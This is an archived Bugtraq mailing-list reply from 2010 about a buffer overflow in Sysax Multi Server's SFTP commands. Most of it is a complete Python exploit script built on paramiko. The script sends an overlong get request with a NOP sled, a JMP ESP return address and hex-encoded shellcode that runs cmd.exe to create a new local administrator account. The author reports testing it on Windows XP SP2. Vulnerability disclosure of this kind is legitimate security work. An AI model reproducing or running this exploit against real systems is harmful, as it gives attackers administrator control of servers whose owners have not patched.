| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 26 Jun 2010 23:45:59 -0000
From: rob@...ensussecurity.com
To: bugtraq@...urityfocus.com
Subject: Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get"
Commands DoS Vulnerabilities
Assuming the server is running as admin the overflow can actually be used to execute arbitrary code. In our example we spawn an instance of cmd.exe and create a new admin, Billyboy, with a password of woot.
This has been tested with Windows XP SP2.
+-------- Start Exploit --------+
import paramiko
import sys
t_ip = "192.168.1.104" #target IP
t_port = 4019 #target port
password = "asdf" #Known user
username = "asdf" #password for user
transport = paramiko.Transport((t_ip, t_port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir("./") #Execute a good command
buff_pen = "\x90" * 389
buff_pen += "\x65\x82\xa5\x7c" #Point EIP to JMP ESP command in shell32.dll
buff_pen += "\x90" * 3
buff_pen += "\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x79\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x64\x6d\x69\x6e\x00" #Shellcode to make a new admin, billyboy, with a password of 'woot'
buff_pen += "\x90" * 3
buff_pen += "\xcc" * (800 - len(buff_pen))
sftp.get(buff_pen)
+-------- Stop Exploit --------+
Powered by blists - more mailing lists